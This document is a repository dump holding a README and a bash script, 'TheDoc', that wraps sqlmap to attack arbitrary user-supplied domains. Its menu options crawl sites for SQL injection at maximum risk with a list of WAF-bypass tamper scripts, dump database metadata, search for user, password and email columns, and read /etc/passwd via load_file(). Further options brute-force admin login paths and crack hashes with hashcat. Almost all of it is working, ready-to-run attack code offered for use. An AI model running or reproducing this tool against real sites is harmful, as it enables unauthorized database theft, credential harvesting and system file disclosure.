├── README.md └── thedoc.sh /README.md: -------------------------------------------------------------------------------- 1 | # TheDoc 2 | is a simple but very useful SQLMAP automator with built in admin finder, hash cracker(using hashcat) and more! 3 | 4 | # Abilities: 5 | - Counts total injections tried. 6 | - Crawls given domain for vulnerabilties. 7 | - Extracts Database Infos (via injection URL) 8 | - Extract Users, Passwords & emails (via injection URL) 9 | - Extracts /etc/passwd (IF DB ADMIN via injection URL) 10 | - Finds domains admin login page. 11 | - Cracks any hashtype (Uses hashcat, fair-warning LOL!) 12 | 13 | # Usage 14 | - chmod +x theDoc.sh 15 | - ./theDoc.sh 16 | - bash theDoc.sh 17 | 18 | Hope you enjoy, i know it's a simple as hell project but then again, i'm making tools that make my proccess easier sooo..lol. 19 | - Xecurity. 20 | - Twitter: @AnonyInfo | @0x3curity 21 | -------------------------------------------------------------------------------- /thedoc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ####################### 3 | # colors 4 | PURPLE=$(tput setaf 125) 5 | RED=$(tput setaf 1) 6 | GREEN=$(tput setaf 2) 7 | WHITE=$(tput setaf 7) 8 | CYAN=$(tput setaf 5) 9 | YELLOW=$(tput setaf 3) 10 | BLUE=$(tput setaf 4) 11 | RESET=$(tput sgr0) 12 | #################################################### 13 | #Variables 14 | wafs="apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes" 15 | theDiv="${YELLOW}.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo$.oOo.oOo.oOo.oOo.${RESET}\n" 16 | dumps=$(ls /$HOME/.sqlmap/output/*$theURL*/dump/ 2> /dev/null | wc -l) 17 | #################################################### 18 | #Functions 19 | #------------------------------------------------------ 20 | function injects() 21 | { 22 | touch inj.txt 23 | file="inj.txt" 24 | 25 | if [ -e ${file} ]; then 26 | count=$(cat ${file}) 27 | else 28 | count=0 29 | fi 30 | } 31 | #----------------------------------------------------- 32 | function ascii_banner() 33 | { 34 | echo 35 | clear 36 | 37 | echo -e "${YELLOW}.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo$.oOo.oOo.oOo.oOo.${RESET}" 38 | cat<<"EOT" 39 | _____ _ 40 | |_ _| |_ ___ 41 | | | | ' \/ -_) 42 | |_| |_||_\___| 43 | .--. 44 | ,-.------+-.| ,-. 45 | ,--=======* )"("")===)===* ) 46 | ô `-"---==-+-"| `-" 47 | O '--' Coded by: 48 | ___ ___ ___ Xecurity · Pyr0. 49 | | \ / _ \ / __| 50 | | |) | (_) | (__ 51 | |___/ \___/ \___| 52 | 53 | EOT 54 | echo -e "\t\tVer: ${PURPLE}AnonyInfo${RESET}\n\t\tDisc: Doing all the things you wish ${PURPLE}SQLMAP${RESET} did!\n\t\tSQLMap ${PURPLE}automation${RESET} never looked so sexy${PURPLE}!${RESET}" 55 | echo 56 | echo -e "\t\tTotal Injection Attempt/s: ${CYAN}${count}${RESET}." 57 | echo -e "${YELLOW}.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo$.oOo.oOo.oOo.oOo.${RESET}" 58 | } 59 | 60 | ############ 61 | function leakage() 62 | { 63 | leakType="${2}" 64 | #crawlOn="${3}" 65 | 66 | #----------------------Crawler------------------------# 67 | if [ $leakType == "crawl" ] && [ "${wafIT}" == "yes" ]; then 68 | echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\t" 69 | read theURL 70 | echo -e $theDiv 71 | ( sqlmap -u "${theURL}" --threads 10 --random-agent --ignore-proxy --crawl 3 --risk 3 --level 3 --tamper "${wafs}" --batch --dbs ) 72 | ((count++)) 73 | echo $count > $file 74 | echo -e $theDiv 75 | main_menu 76 | elif [ $leakType == "crawl" ] && [ "${wafIT}" == "no" ]; then 77 | echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\t" 78 | read theURL 79 | echo -e $theDiv 80 | ( sqlmap -u "${theURL}" --threads 10 --random-agent --batch --ignore-proxy --crawl 3 --risk 3 --level 3 --dbs ) 81 | ((count++)) 82 | echo $count > $file 83 | echo -e $theDiv 84 | main_menu 85 | fi 86 | #----------------------Dump MySQL info------------------------# 87 | if [ $leakType == "dbinfo" ] && [ "${wafIT}" == "yes" ]; then 88 | echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\n(${PURPLE}ex:url.com/index=${RESET})\t" 89 | read theURL 90 | ( sqlmap -u "${theURL}" --threads 10 --random-agent --batch --ignore-proxy --risk 3 --tamper "${wafs}" --level 3 --current-user -b --current-db --dbs ) 91 | ((count++)) 92 | echo $count > $file 93 | main_menu 94 | elif [ $leakType == "dbinfo" ] && [ "${wafIT}" == "no" ]; then 95 | echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\n(${PURPLE}ex:url.com/index=${RESET})\t" 96 | read theURL 97 | ( sqlmap -u "${theURL}" --threads 10 --random-agent --batch --ignore-proxy --risk 3 --level 3 --current-user -b --current-db --dbs ) 98 | ((count++)) 99 | echo $count > $file 100 | main_menu 101 | fi 102 | #----------------------Dump /etc/passwd (IF DBA)------------------------# 103 | if [ $leakType == "fidump" ] && [ "${wafIT}" == "yes" ]; then 104 | echo -e "INFO: ${CYAN}This ONLY works if you are DB ADMIN${RESET}." 105 | echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\n(${PURPLE}ex:url.com/index=${RESET})\t" 106 | read theURL 107 | echo -e $theDiv 108 | ( sqlmap -u "${theURL}" --threads 10 --random-agent --batch --ignore-proxy --risk 3 --level 3 --tamper "${wafs}" --sql-query="load_file('/etc/passwd')" ) 109 | ((count++)) 110 | echo $count > $file 111 | echo -e $theDiv 112 | main_menu 113 | elif [ $leakType == "fidump" ] && [ "${wafIT}" == "no" ]; then 114 | echo -e "INFO: ${CYAN}This ONLY works if you are DB ADMIN${RESET}." 115 | echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\n(${PURPLE}ex:url.com/index=${RESET})\t" 116 | read theURL 117 | echo -e $theDiv 118 | ( sqlmap -u "${theURL}" --threads 10 --random-agent --batch --ignore-proxy --risk 3 --level 3 --sql-query="load_file('/etc/passwd')" ) 119 | ((count++)) 120 | echo $count > $file 121 | echo -e $theDiv 122 | main_menu 123 | fi 124 | #----------------------Dump Users, Emails, and PWs------------------------# 125 | if [ $leakType == "dumpit" ] && [ "${wafIT}" == "yes" ]; then 126 | echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\n(${PURPLE}ex:url.com/index=${RESET})\t" 127 | read theURL 128 | ( sqlmap -u "${theURL}" --threads 10 --random-agent --batch --ignore-proxy --tamper "${wafs}" --risk 3 --level 3 --search -C user,pw,email ) 129 | ((count++)) 130 | echo $count > $file 131 | echo -e $theDiv 132 | main_menu 133 | elif [ $leakType == "dumpit" ] && [ "${wafIT}" == "no" ]; then 134 | echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\n(${PURPLE}ex:url.com/index=${RESET})\t" 135 | read theURL 136 | ( sqlmap -u "${theURL}" --threads 10 --random-agent --batch --ignore-proxy --risk 3 --level 3 --search -C user,pw,email ) 137 | ((count++)) 138 | echo $count > $file 139 | echo -e $theDiv 140 | main_menu 141 | fi 142 | } 143 | #---------------------------------------------------- 144 | #Admin Finder 145 | function admin_finder() 146 | { 147 | wget https://raw.githubusercontent.com/UltimateHackers/Breacher/master/paths.txt 2>/dev/null; rm -rf paths.txt.1 2>/dev/null 148 | echo -e "What's the ${PURPLE}domain${RESET} you'd like ${CYAN}admin${RESET} for?\t" 149 | read theURL 150 | echo 151 | for i in `cat paths.txt` 152 | do 153 | curlvar=$(curl -s -o /dev/null -w "%{http_code}" $theURL/$i) 154 | if [ "$curlvar" = "301" ] || [ "$curlvar" = "302" ] || [ "$curlvar" = "201" ] 155 | then 156 | echo -e "${PURPLE}Admin${RESET} Found: ${CYAN}${theURL}${i}${RESET}" 157 | break 158 | else 159 | echo -e "${PURPLE}Searching...${RESET}...${CYAN}.${RESET}" 160 | fi 161 | done 162 | } 163 | #----------------------------------------------------- 164 | function hash_it() 165 | { 166 | thefi="hash.txt" 167 | theList="/usr/share/sqlmap/txt/smalldict.txt" 168 | echo -e "What's the ${PURPLE}HASH${RESET} you'd like to ${CYAN}crack${RESET}?\t" 169 | read theHASH 170 | echo $theHASH > $thefi 171 | ( pkill hashcat ) 172 | ( hashcat -m 0 -O $thefi "${theList}" --force ) 173 | main_menu 174 | } 175 | #---------------------------------------------------- 176 | function wsqlmap() 177 | { 178 | which sqlmap > /dev/null 2>&1 179 | if [ "$?" != 0 ]; then 180 | echo -e "${CYAN}[!]${RESET} ut oh, no SQLMAP! We'll fix that!" 181 | isql 182 | else 183 | echo -e "${CYAN}[+]${RESET} Nice, SQLMAP's already installed." 184 | fi 185 | } 186 | #--------------------------------------------------------- 187 | function isql() 188 | { 189 | echo -e "$g[i]$e Installing sqlmap... please wait..." 190 | apt-get install sqlmap > /dev/null 2>&1 191 | if [ "$?" != 0 ]; then 192 | echo -e "${CYAN}[+]${RESET} SQLMAP not installed... please try again or check your connection.." 193 | exit 1 194 | else 195 | echo -e "$${CYAN}[+]${RESET}SQLmap is installed." 196 | 197 | fi 198 | } 199 | #--------------------------------------------------------- 200 | function main_menu() 201 | { 202 | select mainmnu in "Crawl Domain" "Grab MySQL Info" "Extract User Infos" "Extact Systems User/PWs" "Find Admin" "Crack/Find Hash" 203 | do 204 | case $mainmnu in 205 | "Extact Systems User/PWs") 206 | echo -e "How ${PURPLE}secure${RESET} is the domain? Want to use ${CYAN}WAF${RESET} bypass methods??" 207 | read waf 208 | if [ "${waf}" == "Yes" ]; then 209 | wafIT="yes" 210 | leakage "${waf}" "fidump" 211 | elif [ "${waf}" == "No" ]; then 212 | wafIT="no" 213 | leakage "${waf}" "fidump" 214 | else 215 | echo -e "${CYAN}Let's try again${RESET}, lol - Next time: ${RESET}Yes (${PURPLE}OR${RESET}) NO${RESET}" 216 | echo 217 | main_menu 218 | fi 219 | ;; 220 | "Crawl Domain") 221 | echo -e "How ${PURPLE}secure${RESET} is the domain? Want to use ${CYAN}WAF${RESET} bypass methods??" 222 | read waf 223 | if [ "${waf}" == "Yes" ]; then 224 | wafIT="yes" 225 | leakage "${waf}" "crawl" 226 | elif [ "${waf}" == "No" ]; then 227 | wafIT="no" 228 | leakage "${waf}" "crawl" 229 | else 230 | echo -e "${CYAN}Let's try again${RESET}, lol - Next time: ${RESET}Yes (${PURPLE}OR${RESET}) NO${RESET}" 231 | echo 232 | main_menu 233 | fi 234 | ;; 235 | "Grab MySQL Info") 236 | echo -e "How ${PURPLE}secure${RESET} is the domain? Want to use ${CYAN}WAF${RESET} bypass methods??" 237 | read waf 238 | if [ "${waf}" == "Yes" ]; then 239 | wafIT="yes" 240 | leakage "${waf}" "dbinfo" 241 | elif [ "${waf}" == "No" ]; then 242 | wafIT="no" 243 | leakage "${waf}" "dbinfo" 244 | else 245 | echo -e "${CYAN}Let's try again${RESET}, lol - Next time: ${RESET}Yes (${PURPLE}OR${RESET}) NO${RESET}" 246 | echo 247 | main_menu 248 | fi 249 | ;; 250 | "Extract User Infos") 251 | echo -e "How ${PURPLE}secure${RESET} is the domain? Want to use ${CYAN}WAF${RESET} bypass methods??" 252 | read waf 253 | if [ "${waf}" == "Yes" ]; then 254 | wafIT="yes" 255 | leakage "${waf}" "dumpit" 256 | elif [ "${waf}" == "No" ]; then 257 | wafIT="no" 258 | leakage "${waf}" "dumpit" 259 | else 260 | echo -e "${CYAN}Let's try again${RESET}, lol - Next time: ${RESET}Yes (${PURPLE}OR${RESET}) NO${RESET}" 261 | echo 262 | main_menu 263 | fi 264 | ;; 265 | "Find Admin") 266 | admin_finder 267 | ;; 268 | "Crack/Find Hash") 269 | hash_it 270 | ;; 271 | *) 272 | echo -e "${CYAN}Let's try again${RESET}, lol." 273 | echo 274 | main_menu 275 | ;; 276 | esac 277 | done 278 | } 279 | #################################################### 280 | echo 281 | clear 282 | echo -e "${YELLOW}.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo$.oOo.oOo.oOo.oOo.${RESET}" 283 | echo -e "${CYAN}[+]${RESET} Checking for SQLMAP..."; sleep 1 284 | wsqlmap 285 | sleep 0.3 286 | echo -e "${YELLOW}.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo$.oOo.oOo.oOo.oOo.${RESET}" 287 | injects 288 | ascii_banner 289 | main_menu 290 | --------------------------------------------------------------------------------